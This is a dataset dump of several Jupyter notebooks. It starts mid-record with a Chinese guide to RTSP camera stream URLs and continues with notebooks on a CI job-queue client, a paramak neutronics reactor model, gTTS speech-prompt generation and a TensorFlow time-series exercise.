protected]:554/Streaming/Channels/102?transportmode=unicast (单播)\n\nrtsp://admin:[email protected]:554/Streaming/Channels/102?transportmode=multicast (多播)\n\nrtsp://admin:[email protected]:554/Streaming/Channels/102 (?后面可省略,默认单播)\n\nDS-9016HF-ST的零通道主码流(零通道无子码流):\n\nrtsp://admin:[email protected]:554/Streaming/Channels/001\n\nDS-2DF7274-A的第三码流:\n\nrtsp://admin:[email protected]:554/Streaming/Channels/103\n\n更多信息:https://blog.csdn.net/xiejiashu/article/details/71786187\n \n## 大华\n\n>rtsp://[username]:[password]@[ip]:[port]/cam/realmonitor?[channel]&[subtype]\n\n说明:\n- username: 用户名。例如admin。\n- password: 密码。例如admin。\n- ip: 为设备IP。例如 10.7.8.122。\n- port: 端口号默认为554,若为默认可不填写。\n- channel: 通道号,起始为1。例如通道2,则为channel=2。\n- subtype: 码流类型,主码流为0(即subtype=0),辅码流为1(即subtype=1)。\n\n**例如**,请求某设备的通道2的辅码流,Url如下\n\nrtsp://admin:[email protected]:554/cam/realmonitor?channel=2&subtype=1\n\n## D-Link\n>rtsp://[username]:[password]@[ip]:[port]/[channel].sdp\n\n说明:\n- username:用户名。例如admin\n- password:密码。例如12345,如果没有网络验证可直接写成rtsp:// [ip]:[port]/[channel].sdp\n- ip:为设备IP。例如192.168.0.108。\n- port:端口号默认为554,若为默认可不填写。\n- channel:通道号,起始为1。例如通道2,则为live2。\n\n**例如**,请求某设备的通道2的码流,URL如下\n\nrtsp://admin:[email protected]:554/live2.sdp\n\n## Axis(安讯士)\n\n>rtsp://[username]:[password]@[ip]/axis-media/media.amp?[videocodec]&[resolution]\n\n说明:\n- username:用户名。例如admin\n- password:密码。例如12345,如果没有网络验证可省略用户名密码部分以及@字符。\n- ip:为设备IP。例如192.168.0.108。\n- videocodec:支持MPEG、h.264等,可缺省。\n- resolution:分辨率,如resolution=1920x1080,若采用默认分辨率,可缺省此参数。\n\n**例如**,请求某设备h264编码的1280x720的码流,URL如下:\n\nrtsp:// 192.168.200.202/axis-media/media.amp?videocodec=h264&resolution=1280x720\n\n---\n\n内容来源:\n- https://blog.csdn.net/viola_lulu/article/details/53330727\n- https://blog.csdn.net/xiejiashu/article/details/71786187",
"_____no_output_____"
]
]
] | [
"markdown"
] | [
[
"markdown"
]
] |
cb2d1e83d8acee30587287915590e4a33400b82f | 10,683 | ipynb | Jupyter Notebook | sample-notebooks/task_caller.ipynb | idekerlab/ci-service-template | 5d46f030afe01a959c6afad0af35217347f4483a | [
"MIT"
] | 2 | 2015-10-02T18:41:09.000Z | 2015-10-16T20:57:01.000Z | sample-notebooks/task_caller.ipynb | afcarl/ci-service-template | 5d46f030afe01a959c6afad0af35217347f4483a | [
"MIT"
] | 15 | 2015-05-05T22:46:37.000Z | 2021-01-20T22:55:30.000Z | sample-notebooks/task_caller.ipynb | afcarl/ci-service-template | 5d46f030afe01a959c6afad0af35217347f4483a | [
"MIT"
] | 7 | 2015-04-20T20:48:36.000Z | 2015-11-13T02:35:36.000Z | 28.488 | 88 | 0.464289 | [
[
[
"## Sample Client to Use CI Service Sample\nTested on Python 2.7.9.",
"_____no_output_____"
]
],
[
[
"!ifconfig",
"eth0 Link encap:Ethernet HWaddr 02:42:ac:11:00:99 \r\n inet addr:172.17.0.153 Bcast:0.0.0.0 Mask:255.255.0.0\r\n inet6 addr: fe80::42:acff:fe11:99/64 Scope:Link\r\n UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1\r\n RX packets:1375 errors:0 dropped:2 overruns:0 frame:0\r\n TX packets:392 errors:0 dropped:0 overruns:0 carrier:0\r\n collisions:0 txqueuelen:0 \r\n RX bytes:187331 (187.3 KB) TX bytes:2362686 (2.3 MB)\r\n\r\nlo Link encap:Local Loopback \r\n inet addr:127.0.0.1 Mask:255.0.0.0\r\n inet6 addr: ::1/128 Scope:Host\r\n UP LOOPBACK RUNNING MTU:65536 Metric:1\r\n RX packets:234 errors:0 dropped:0 overruns:0 frame:0\r\n TX packets:234 errors:0 dropped:0 overruns:0 carrier:0\r\n collisions:0 txqueuelen:0 \r\n RX bytes:25814 (25.8 KB) TX bytes:25814 (25.8 KB)\r\n\r\n"
],
[
"import requests\nimport json\nimport py2cytoscape.util as cy\nimport networkx as nx\n\nBASE = 'http://192.168.99.100/v1/'\nHEADERS = {'Content-Type': 'application/json'}\n\n# Generate a scale-free graph with 3000 nodes (with NetworkX)\ng = nx.scale_free_graph(3000)\n\n# Convert to Cytoscape.js JSON\ncyg = cy.from_networkx(g)",
"_____no_output_____"
],
[
"# Hello service\nurl_hello = BASE + 'hello'\n\n\nfor i in range(3):\n post_data = {\n 'name' : 'John Doe ' + str(i)\n}\n res = requests.post(url_hello, data=json.dumps(post_data), headers=HEADERS)\n print(res.content)",
"{\n \"job_id\": \"2837b0fd-84a8-478c-a342-c30c3249b15d\", \n \"result_type\": \"memory\", \n \"status\": \"queued\", \n \"url\": \"queue/2837b0fd-84a8-478c-a342-c30c3249b15d\"\n}\n\n{\n \"job_id\": \"b26754c6-3ee9-4343-a6f4-784e5276e1c9\", \n \"result_type\": \"memory\", \n \"status\": \"queued\", \n \"url\": \"queue/b26754c6-3ee9-4343-a6f4-784e5276e1c9\"\n}\n\n{\n \"job_id\": \"54870a02-b787-40bf-aa8a-bd0411f08e23\", \n \"result_type\": \"memory\", \n \"status\": \"queued\", \n \"url\": \"queue/54870a02-b787-40bf-aa8a-bd0411f08e23\"\n}\n\n"
],
[
"url_algorithms = BASE + 'algorithms'\nprint(url_algorithms)\n\nurl_btw = BASE + 'algorithms/pagerank'\n\nfor i in range(12):\n res = requests.post(url_btw, data=json.dumps(cyg), headers=HEADERS)\n print(res.content)",
"http://192.168.99.100/v1/algorithms\n{\n \"job_id\": \"22d0aac0-1216-4018-a811-46c0800795cc\", \n \"result_type\": \"memory\", \n \"status\": \"queued\", \n \"url\": \"queue/22d0aac0-1216-4018-a811-46c0800795cc\"\n}\n\n{\n \"job_id\": \"be36cfa1-2e39-4f8a-b261-ab525b8cdffb\", \n \"result_type\": \"memory\", \n \"status\": \"queued\", \n \"url\": \"queue/be36cfa1-2e39-4f8a-b261-ab525b8cdffb\"\n}\n\n{\n \"job_id\": \"c881e0df-590b-42c8-9fff-0321aee6b5f5\", \n \"result_type\": \"memory\", \n \"status\": \"queued\", \n \"url\": \"queue/c881e0df-590b-42c8-9fff-0321aee6b5f5\"\n}\n\n{\n \"job_id\": \"eb26fdb7-79ef-42b1-840f-bbac48770106\", \n \"result_type\": \"memory\", \n \"status\": \"queued\", \n \"url\": \"queue/eb26fdb7-79ef-42b1-840f-bbac48770106\"\n}\n\n{\n \"job_id\": \"7aeeb9ce-542c-401b-b6f1-5974ad6cce0d\", \n \"result_type\": \"memory\", \n \"status\": \"queued\", \n \"url\": \"queue/7aeeb9ce-542c-401b-b6f1-5974ad6cce0d\"\n}\n\n{\n \"job_id\": \"e01600e0-50fd-4e9a-8b51-d7150ae76a9c\", \n \"result_type\": \"memory\", \n \"status\": \"queued\", \n \"url\": \"queue/e01600e0-50fd-4e9a-8b51-d7150ae76a9c\"\n}\n\n{\n \"job_id\": \"6d9ce5dd-ed4e-41bc-9005-a9fc5759af87\", \n \"result_type\": \"memory\", \n \"status\": \"queued\", \n \"url\": \"queue/6d9ce5dd-ed4e-41bc-9005-a9fc5759af87\"\n}\n\n{\n \"job_id\": \"c6f70c80-82ba-4b73-8e32-ae60be5fc44e\", \n \"result_type\": \"memory\", \n \"status\": \"queued\", \n \"url\": \"queue/c6f70c80-82ba-4b73-8e32-ae60be5fc44e\"\n}\n\n{\n \"job_id\": \"31558f6e-0eed-4436-84e0-bf3e8f77a9bd\", \n \"result_type\": \"memory\", \n \"status\": \"queued\", \n \"url\": \"queue/31558f6e-0eed-4436-84e0-bf3e8f77a9bd\"\n}\n\n{\n \"job_id\": \"c65a4993-e83a-4344-9fd1-03c265448ae2\", \n \"result_type\": \"memory\", \n \"status\": \"queued\", \n \"url\": \"queue/c65a4993-e83a-4344-9fd1-03c265448ae2\"\n}\n\n{\n \"job_id\": \"1ad63ea6-538a-4daa-a8aa-a12b367b4f2c\", \n \"result_type\": \"memory\", \n \"status\": \"queued\", \n \"url\": \"queue/1ad63ea6-538a-4daa-a8aa-a12b367b4f2c\"\n}\n\n{\n \"job_id\": \"69695277-2b7d-4203-a54d-00a454bf5e32\", \n \"result_type\": \"memory\", \n \"status\": \"queued\", \n \"url\": \"queue/69695277-2b7d-4203-a54d-00a454bf5e32\"\n}\n\n"
],
[
"# Apply layout URL:\n\nurl_apply = BASE + 'generators/scalefree'\npost_data = {\n 'num_nodes': 1000\n}\n\nfor i in range(5):\n res = requests.post(url_apply, data=json.dumps(post_data), headers=HEADERS)\n print(res.content)",
"{\n \"job_id\": \"cace0dbb-b1ca-45d4-85a4-19535a2be8f0\", \n \"result_type\": \"file\", \n \"status\": \"queued\", \n \"url\": \"queue/cace0dbb-b1ca-45d4-85a4-19535a2be8f0\"\n}\n\n{\n \"job_id\": \"1bbd547a-8f49-45e4-a41b-be3415f3b471\", \n \"result_type\": \"file\", \n \"status\": \"queued\", \n \"url\": \"queue/1bbd547a-8f49-45e4-a41b-be3415f3b471\"\n}\n\n{\n \"job_id\": \"3012143f-c254-4eed-8f2f-cd3973631bc5\", \n \"result_type\": \"file\", \n \"status\": \"queued\", \n \"url\": \"queue/3012143f-c254-4eed-8f2f-cd3973631bc5\"\n}\n\n{\n \"job_id\": \"043ad136-9f74-4a82-9d66-ed1f4a511e0b\", \n \"result_type\": \"file\", \n \"status\": \"queued\", \n \"url\": \"queue/043ad136-9f74-4a82-9d66-ed1f4a511e0b\"\n}\n\n{\n \"job_id\": \"d4bc7b2d-10a5-48bb-85ed-6fd826c19598\", \n \"result_type\": \"file\", \n \"status\": \"queued\", \n \"url\": \"queue/d4bc7b2d-10a5-48bb-85ed-6fd826c19598\"\n}\n\n"
],
[
"# Job Status\nurl_jobs = BASE + 'jobs'\nprint(url_jobs)\n\nres = requests.get(url_jobs)\njobs = res.json()\n\nprint('Number of jobs = ' + str(len(jobs)))",
"http://192.168.99.100/v1/jobs\nNumber of jobs = 20\n"
],
[
"# Delete the first job\nres = requests.delete(url_jobs + '/' + jobs[0]['job_id'])\nprint(json.dumps(res.json(), indent=4))",
"{\n \"message\": \"Job 2837b0fd-84a8-478c-a342-c30c3249b15d removed.\"\n}\n"
],
[
"# res = requests.delete(url_jobs)\n# print(json.dumps(res.json(), indent=4))",
"_____no_output_____"
]
]
] | [
"markdown",
"code"
] | [
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code"
]
] |
cb2d2b898f5229f2f1de9c2f947738fd15b2b6d9 | 7,523 | ipynb | Jupyter Notebook | tasks/task_12_CAD_mesh_fast_flux/1_making_shapes_into_a_neutronics_model.ipynb | pshriwise/openmc_workshop | 7bf1fe7483305c63c9442a9e80266b56675489fb | [
"MIT"
] | null | null | null | tasks/task_12_CAD_mesh_fast_flux/1_making_shapes_into_a_neutronics_model.ipynb | pshriwise/openmc_workshop | 7bf1fe7483305c63c9442a9e80266b56675489fb | [
"MIT"
] | null | null | null | tasks/task_12_CAD_mesh_fast_flux/1_making_shapes_into_a_neutronics_model.ipynb | pshriwise/openmc_workshop | 7bf1fe7483305c63c9442a9e80266b56675489fb | [
"MIT"
] | null | null | null | 26.583039 | 171 | 0.554167 | [
[
[
"# Heating Mesh Tally on CAD geometry made from Shapes\n\nThis constructs a reactor geometry from 3 Shape objects each made from points.\n\nThe Shapes made include a breeder blanket, PF coil and a central column shield.\n\n2D and 3D Meshes tally are then simulated to show nuclear heating, flux and tritium_production across the model.",
"_____no_output_____"
],
[
"This makes a 3D geometry and material for PF coil",
"_____no_output_____"
]
],
[
[
"import paramak\n\npf_coil = paramak.RotateStraightShape(\n points=[\n (700, 0),\n (750, 0),\n (750, 50),\n (700, 50)\n ],\n stp_filename = 'pf_coil.stp',\n material_tag = 'pf_coil_material'\n)\n\npf_coil.solid",
"_____no_output_____"
]
],
[
[
"This makes a 3D geometry and material for the centre column",
"_____no_output_____"
]
],
[
[
"center_column = paramak.RotateMixedShape(\n points=[\n (50, 600, 'straight'),\n (150, 600, 'spline'),\n (100, 0, 'spline'),\n (150, -600, 'straight'),\n (50, -600, 'straight')\n ],\n stp_filename = 'center_column.stp',\n material_tag = 'center_column_material'\n)\n\ncenter_column.solid",
"_____no_output_____"
]
],
[
[
"This makes a 3D geometry and material for breeder blanket. The azimuth_placement_angle argument is used to repeat the geometry around the Z axis at specified angles.",
"_____no_output_____"
]
],
[
[
"blanket = paramak.RotateSplineShape(\n points=[\n (600, 0),\n (600, -20),\n (500, -300),\n (400, -300),\n (400, 0),\n (400, 300),\n (500, 300),\n (600, 20)\n ],\n rotation_angle=40,\n azimuth_placement_angle=[0, 45, 90, 135, 180, 225, 270, 315],\n stp_filename = 'blanket.stp',\n material_tag = 'blanket_material'\n)\n\nblanket.solid",
"_____no_output_____"
]
],
[
[
"This makes a reactor object from the three components",
"_____no_output_____"
]
],
[
[
"my_reactor = paramak.Reactor([blanket, pf_coil,center_column])\n\nmy_reactor.solid",
"_____no_output_____"
]
],
[
[
"At this stage we can export the reactor geometry as stp files and make them avaialbe from download and viewing in FreeCAD.",
"_____no_output_____"
]
],
[
[
"my_reactor.export_stp()\n\nfrom IPython.display import FileLink\ndisplay(FileLink('blanket.stp'))\ndisplay(FileLink('pf_coil.stp'))\ndisplay(FileLink('center_column.stp'))\ndisplay(FileLink('Graveyard.stp'))",
"_____no_output_____"
]
],
[
[
"The next section defines the materials. This can be done using openmc.Materials or in this case strings that look up materials from the neutronics material maker.",
"_____no_output_____"
]
],
[
[
"from neutronics_material_maker import Material\n\nmat1 = Material(material_name='Li4SiO4',\n material_tag='blanket_material')\n\nmat2 = Material(material_name='copper',\n material_tag='pf_coil_material')\n\nmat3 = Material(material_name='WC',\n material_tag='center_column_material')",
"_____no_output_____"
]
],
[
[
"This next step makes a simple point source",
"_____no_output_____"
]
],
[
[
"import openmc\n\n# initialises a new source object\nsource = openmc.Source()\n\n# sets the location of the source to x=0 y=0 z=0\nsource.space = openmc.stats.Point((100, 0, 0))\n\n# sets the direction to isotropic\nsource.angle = openmc.stats.Isotropic()\n\n# sets the energy distribution to 100% 14MeV neutrons\nsource.energy = openmc.stats.Discrete([14e6], [1])",
"_____no_output_____"
]
],
[
[
"This next section combines the geometry with the materials and specifies a few mesh tallies",
"_____no_output_____"
]
],
[
[
"neutronics_model = paramak.NeutronicsModel(\n geometry=my_reactor,\n mesh_tally_2d=['heating', 'flux', '(n,Xt)'],\n mesh_tally_3d=['heating', 'flux', '(n,Xt)'],\n source=source,\n simulation_batches=10,\n simulation_particles_per_batch=1000,\n materials={\n 'blanket_material': mat1,\n 'pf_coil_material': mat2,\n 'center_column_material': mat3,\n }\n)\n\nneutronics_model.simulate()",
"_____no_output_____"
]
],
[
[
"The next section produces download links for:\n\n- vtk files that contain the 3D mesh results (open with Paraview)\n- png images that show the resuls of the 2D mesh tally",
"_____no_output_____"
]
],
[
[
"from IPython.display import FileLink\ndisplay(FileLink('heating_on_3D_mesh.vtk'))\ndisplay(FileLink('flux_on_3D_mesh.vtk'))\ndisplay(FileLink('tritium_production_on_3D_mesh.vtk'))\ndisplay(FileLink('flux_on_2D_mesh_xy.png'))\ndisplay(FileLink('flux_on_2D_mesh_xz.png'))\ndisplay(FileLink('flux_on_2D_mesh_yz.png'))\ndisplay(FileLink('heating_on_2D_mesh_xy.png'))\ndisplay(FileLink('heating_on_2D_mesh_xz.png'))\ndisplay(FileLink('heating_on_2D_mesh_yz.png'))\ndisplay(FileLink('tritium_production_on_2D_mesh_yz.png'))\ndisplay(FileLink('tritium_production_on_2D_mesh_xz.png'))\ndisplay(FileLink('tritium_production_on_2D_mesh_yz.png'))",
"_____no_output_____"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code"
] | [
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
]
] |
cb2d2c1f8804a7c88be557e95553a73a96fa6fab | 12,067 | ipynb | Jupyter Notebook | src/.ipynb_checkpoints/tts-sandbox-checkpoint.ipynb | JosuVicente/facial_and_characteristics_recognition_with_speech_support | a297f475fe705c67c8b81a34ff9edc0234bad626 | [
"MIT"
] | 1 | 2019-09-02T10:08:05.000Z | 2019-09-02T10:08:05.000Z | src/.ipynb_checkpoints/tts-sandbox-checkpoint.ipynb | JosuVicente/facial_and_characteristics_recognition_with_speech_support | a297f475fe705c67c8b81a34ff9edc0234bad626 | [
"MIT"
] | null | null | null | src/.ipynb_checkpoints/tts-sandbox-checkpoint.ipynb | JosuVicente/facial_and_characteristics_recognition_with_speech_support | a297f475fe705c67c8b81a34ff9edc0234bad626 | [
"MIT"
] | null | null | null | 67.413408 | 2,146 | 0.635866 | [
[
[
"from gtts import gTTS\nLANG_PATH = '../lang/{0}/speech/{1}.mp3'\n\ntts = gTTS(text='Se ha detectado más de una persona, inténtelo de nuevo con una persona sólo por favor', lang='es', slow=False)\ntts.save(LANG_PATH.format('es', 'more_than_one_face'))\ntts = gTTS(text='There appears to be more than one person, try again with one person only please', lang='en', slow=False)\ntts.save(LANG_PATH.format('en', 'more_than_one_face'))\n\ntts = gTTS(text='ha sido guardado correctamente', lang='es', slow=False)\ntts.save(LANG_PATH.format('es', 'saved'))\ntts = gTTS(text='has been saved correctly', lang='en', slow=False)\ntts.save(LANG_PATH.format('en', 'saved'))\n\ntts = gTTS(text='diga el nombre de la persona detectada o cancelar después del pitido por favor', lang='es', slow=False)\ntts.save(LANG_PATH.format('es', 'who'))\ntts = gTTS(text='say the name of the person detected or cancel after the beep please', lang='en', slow=False)\ntts.save(LANG_PATH.format('en', 'who'))\n\ntts = gTTS(text='guardando', lang='es', slow=False)\ntts.save(LANG_PATH.format('es', 'saving'))\ntts = gTTS(text='saving', lang='en', slow=False)\ntts.save(LANG_PATH.format('en', 'saving'))\n\ntts = gTTS(text='un momento por favor', lang='es', slow=False)\ntts.save(LANG_PATH.format('es', 'one_moment'))\ntts = gTTS(text='one moment please', lang='en', slow=False)\ntts.save(LANG_PATH.format('en', 'one_moment'))\n\ntts = gTTS(text='lo siento, no he entendido bien', lang='es', slow=False)\ntts.save(LANG_PATH.format('es', 'not_understand'))\ntts = gTTS(text='sorry, I didn´t catch that', lang='en', slow=False)\ntts.save(LANG_PATH.format('en', 'not_understand'))\n\ntts = gTTS(text='cancelado', lang='es', slow=False)\ntts.save(LANG_PATH.format('es', 'canceled'))\ntts = gTTS(text='canceled', lang='en', slow=False)\ntts.save(LANG_PATH.format('en', 'canceled'))\n\ntts = gTTS(text='seleccione una opción. O diga: Comandos. Para oir una lista de comandos sonoros. O: Teclas. Para oir una lista de comandos de entrada.', lang='es', slow=False)\ntts.save(LANG_PATH.format('es', 'choose'))\ntts = gTTS(text='select an option. Or say Options to hear a list of available commands. Or say Keys to hear a list of available keys', lang='en', slow=False)\ntts.save(LANG_PATH.format('en', 'choose'))\n\ntts = gTTS(text='seleccione una opción', lang='es', slow=False)\ntts.save(LANG_PATH.format('es', 'choose_short'))\ntts = gTTS(text='select an option', lang='en', slow=False)\ntts.save(LANG_PATH.format('en', 'choose_short'))\n\ntts = gTTS(text='Diga: ¿Quién? Para obtener una descripción de las personas en la imagen. Diga: ¿Qué? Para obtener una descripción general de la imagen. Diga: Guardar. Para guardar en el sistema el nombre de la persona en la imagen. Diga: Idioma. Para cambiar el idioma al siguiente disponible. Diga: Cancelar. Para continuar o diga: Repetir: Para repetir las opciones. ', lang='es', slow=False)\ntts.save(LANG_PATH.format('es', 'commands'))\ntts = gTTS(text='Say: Who. To get a description of the people in the image. Say: What. To get a general description of the image. Say: Save. To save the name of the person in the image. Say: Language. To change the language. Say: Cancel. To continue. Say: Repeat. To repeat the list of available options', lang='en', slow=False)\ntts.save(LANG_PATH.format('en', 'commands'))\n\ntts = gTTS(text='Pulse \"A\". Para obtener una descripción de las personas en la imagen. Pulse \"Z\". Para obtener una descripción general de la imagen. Pulse \"S\". Para guardar en el sistema el nombre de la persona en la imagen. Pulse \"L\". Para cambiar el idioma al siguiente disponible. Pulse \"Q\". Para continuar o pulse: \"R\": Para repetir las opciones. ', lang='es', slow=False)\ntts.save(LANG_PATH.format('es', 'keys'))\ntts = gTTS(text='Press \"A\". To get a description of the people in the image. Press \"Z\". To get a general description of the image. Press \"S\". To save the name of the person in the image. Press \"L\". To change the language. Press \"Q\". To continue. Press \"R\". To repeat the list of available options', lang='en', slow=False)\ntts.save(LANG_PATH.format('en', 'keys'))\n\ntts = gTTS(text='Idioma cambiado a español', lang='es', slow=False)\ntts.save(LANG_PATH.format('es', 'lang_change'))\ntts = gTTS(text='Language has been changed to english', lang='en', slow=False)\ntts.save(LANG_PATH.format('en', 'lang_change'))\n\ntts = gTTS(text='De acuerdo', lang='es', slow=False)\ntts.save(LANG_PATH.format('es', 'ok'))\ntts = gTTS(text='OK', lang='en', slow=False)\ntts.save(LANG_PATH.format('en', 'ok'))\n\ntts = gTTS(text='Lo siento, no te he entendido', lang='es', slow=False)\ntts.save(LANG_PATH.format('es', 'sorry_understand'))\ntts = gTTS(text='Sorry, I didn not get that', lang='en', slow=False)\ntts.save(LANG_PATH.format('en', 'sorry_understand'))\n\ntts = gTTS(text='¿Quieres que repita las opciones disponibles?', lang='es', slow=False)\ntts.save(LANG_PATH.format('es', 'repeat_options'))\ntts = gTTS(text='Do you want me to repeat the available options?', lang='en', slow=False)\ntts.save(LANG_PATH.format('en', 'repeat_options'))\n\ntts = gTTS(text='Lo siento, no soy capaz de describir la imagen', lang='es', slow=False)\ntts.save(LANG_PATH.format('es', 'no_image'))\ntts = gTTS(text='Sorry, I cannot understand what''s in the image', lang='en', slow=False)\ntts.save(LANG_PATH.format('en', 'no_image'))\n\n",
"_____no_output_____"
],
[
"from gtts import gTTS\ntts = gTTS(text='Pulse, A. Para obtener una descripción de las personas en la imagen. Pulse \"Z\". Para obtener una descripción general de la imagen. Pulse \"S\". Para guardar en el sistema el nombre de la persona en la imagen. Pulse \"L\". Para cambiar el idioma al siguiente disponible. Pulse \"Q\". Para continuar o pulse: \"R\": Para repetir las opciones. ', lang='es', slow=False)\ntts.save(LANG_PATH.format('es', 'keys'))",
"_____no_output_____"
],
[
"words = ['man', 'woman', 'angry', 'disgust', 'happy', 'neutral', 'sad', 'surprise']\nwords_es_h = ['hombre', 'mujer', 'enfadado', 'asqueado', 'contento', 'neutral', 'triste', 'sorprendido']\nwords_es_m = ['hombre', 'mujer', 'enfadada', 'asqueada', 'contenta', 'neutral', 'triste', 'sorprendida']\n\nfor i in range(len(words)):\n tts = gTTS(text=words[i], lang='en', slow=False)\n tts.save(\"en/\" + words[i] + \".wav\")\n tts = gTTS(text=words_es_h[i], lang='es', slow=False)\n tts.save(\"esh/\" + words[i] + \".wav\")\n tts = gTTS(text=words_es_m[i], lang='es', slow=False)\n tts.save(\"esm/\" + words[i] + \".wav\")\n ",
"_____no_output_____"
]
]
] | [
"code"
] | [
[
"code",
"code",
"code"
]
] |
cb2d4c215c7d2dfa00d8cd2adcfc4fd3cca6911a | 584,363 | ipynb | Jupyter Notebook | Week 2/Time Series with Tensorflow/Course_4_Week_1_Exercise_Question.ipynb | atharvagj-ai/ML-Deep-Learning-Journey | c336354ebef7e9a159ae03873fc1612b48aa9161 | [
"MIT"
] | null | null | null | Week 2/Time Series with Tensorflow/Course_4_Week_1_Exercise_Question.ipynb | atharvagj-ai/ML-Deep-Learning-Journey | c336354ebef7e9a159ae03873fc1612b48aa9161 | [
"MIT"
] | null | null | null | Week 2/Time Series with Tensorflow/Course_4_Week_1_Exercise_Question.ipynb | atharvagj-ai/ML-Deep-Learning-Journey | c336354ebef7e9a159ae03873fc1612b48aa9161 | [
"MIT"
] | null | null | null | 773.990728 | 100,258 | 0.936637 | [
[
[
"<a href=\"https://colab.research.google.com/github/MoRebaie/Sequences-Time-Series-Prediction-in-Tensorflow/blob/master/Course_4_Week_1_Exercise_Question.ipynb\" target=\"_parent\"><img src=\"https://colab.research.google.com/assets/colab-badge.svg\" alt=\"Open In Colab\"/></a>",
"_____no_output_____"
]
],
[
[
"!pip install tensorflow==2.0.0b1\n",
"Collecting tensorflow==2.0.0b1\n\u001b[?25l Downloading https://files.pythonhosted.org/packages/29/6c/2c9a5c4d095c63c2fb37d20def0e4f92685f7aee9243d6aae25862694fd1/tensorflow-2.0.0b1-cp36-cp36m-manylinux1_x86_64.whl (87.9MB)\n\u001b[K |████████████████████████████████| 87.9MB 22.4MB/s \n\u001b[?25hRequirement already satisfied: keras-preprocessing>=1.0.5 in /usr/local/lib/python3.6/dist-packages (from tensorflow==2.0.0b1) (1.1.0)\nRequirement already satisfied: google-pasta>=0.1.6 in /usr/local/lib/python3.6/dist-packages (from tensorflow==2.0.0b1) (0.1.7)\nRequirement already satisfied: wrapt>=1.11.1 in /usr/local/lib/python3.6/dist-packages (from tensorflow==2.0.0b1) (1.11.2)\nRequirement already satisfied: absl-py>=0.7.0 in /usr/local/lib/python3.6/dist-packages (from tensorflow==2.0.0b1) (0.7.1)\nRequirement already satisfied: wheel>=0.26 in /usr/local/lib/python3.6/dist-packages (from tensorflow==2.0.0b1) (0.33.4)\nRequirement already satisfied: gast>=0.2.0 in /usr/local/lib/python3.6/dist-packages (from tensorflow==2.0.0b1) (0.2.2)\nRequirement already satisfied: termcolor>=1.1.0 in /usr/local/lib/python3.6/dist-packages (from tensorflow==2.0.0b1) (1.1.0)\nRequirement already satisfied: grpcio>=1.8.6 in /usr/local/lib/python3.6/dist-packages (from tensorflow==2.0.0b1) (1.15.0)\nRequirement already satisfied: numpy<2.0,>=1.14.5 in /usr/local/lib/python3.6/dist-packages (from tensorflow==2.0.0b1) (1.16.4)\nCollecting tf-estimator-nightly<1.14.0.dev2019060502,>=1.14.0.dev2019060501 (from tensorflow==2.0.0b1)\n\u001b[?25l Downloading https://files.pythonhosted.org/packages/32/dd/99c47dd007dcf10d63fd895611b063732646f23059c618a373e85019eb0e/tf_estimator_nightly-1.14.0.dev2019060501-py2.py3-none-any.whl (496kB)\n\u001b[K |████████████████████████████████| 501kB 35.9MB/s \n\u001b[?25hRequirement already satisfied: keras-applications>=1.0.6 in /usr/local/lib/python3.6/dist-packages (from tensorflow==2.0.0b1) (1.0.8)\nCollecting tb-nightly<1.14.0a20190604,>=1.14.0a20190603 (from tensorflow==2.0.0b1)\n\u001b[?25l Downloading https://files.pythonhosted.org/packages/a4/96/571b875cd81dda9d5dfa1422a4f9d749e67c0a8d4f4f0b33a4e5f5f35e27/tb_nightly-1.14.0a20190603-py3-none-any.whl (3.1MB)\n\u001b[K |████████████████████████████████| 3.1MB 40.0MB/s \n\u001b[?25hRequirement already satisfied: six>=1.10.0 in /usr/local/lib/python3.6/dist-packages (from tensorflow==2.0.0b1) (1.12.0)\nRequirement already satisfied: protobuf>=3.6.1 in /usr/local/lib/python3.6/dist-packages (from tensorflow==2.0.0b1) (3.7.1)\nRequirement already satisfied: astor>=0.6.0 in /usr/local/lib/python3.6/dist-packages (from tensorflow==2.0.0b1) (0.8.0)\nRequirement already satisfied: h5py in /usr/local/lib/python3.6/dist-packages (from keras-applications>=1.0.6->tensorflow==2.0.0b1) (2.8.0)\nRequirement already satisfied: markdown>=2.6.8 in /usr/local/lib/python3.6/dist-packages (from tb-nightly<1.14.0a20190604,>=1.14.0a20190603->tensorflow==2.0.0b1) (3.1.1)\nRequirement already satisfied: setuptools>=41.0.0 in /usr/local/lib/python3.6/dist-packages (from tb-nightly<1.14.0a20190604,>=1.14.0a20190603->tensorflow==2.0.0b1) (41.0.1)\nRequirement already satisfied: werkzeug>=0.11.15 in /usr/local/lib/python3.6/dist-packages (from tb-nightly<1.14.0a20190604,>=1.14.0a20190603->tensorflow==2.0.0b1) (0.15.5)\nInstalling collected packages: tf-estimator-nightly, tb-nightly, tensorflow\n Found existing installation: tensorflow 1.14.0\n Uninstalling tensorflow-1.14.0:\n Successfully uninstalled tensorflow-1.14.0\nSuccessfully installed tb-nightly-1.14.0a20190603 tensorflow-2.0.0b1 tf-estimator-nightly-1.14.0.dev2019060501\n"
],
[
"import tensorflow as tf\nprint(tf.__version__)\n\n# EXPECTED OUTPUT\n# 2.0.0-beta1 (or later)\n",
"2.0.0-beta1\n"
],
[
"import numpy as np\nimport matplotlib.pyplot as plt\nimport tensorflow as tf\nfrom tensorflow import keras\n\ndef plot_series(time, series, format=\"-\", start=0, end=None):\n plt.plot(time[start:end], series[start:end], format)\n plt.xlabel(\"Time\")\n plt.ylabel(\"Value\")\n plt.grid(True)\n\ndef trend(time, slope=0):\n return slope * time\n\ndef seasonal_pattern(season_time):\n \"\"\"Just an arbitrary pattern, you can change it if you wish\"\"\"\n return np.where(season_time < 0.1,\n np.cos(season_time * 7 * np.pi),\n 1 / np.exp(5 * season_time))\n\ndef seasonality(time, period, amplitude=1, phase=0):\n \"\"\"Repeats the same pattern at each period\"\"\"\n season_time = ((time + phase) % period) / period\n return amplitude * seasonal_pattern(season_time)\n\ndef noise(time, noise_level=1, seed=None):\n rnd = np.random.RandomState(seed)\n return rnd.randn(len(time)) * noise_level\n\ntime = np.arange(4 * 365 + 1, dtype=\"float32\")\nbaseline = 10\nseries = trend(time, 0.1) \nbaseline = 10\namplitude = 40\nslope = 0.01\nnoise_level = 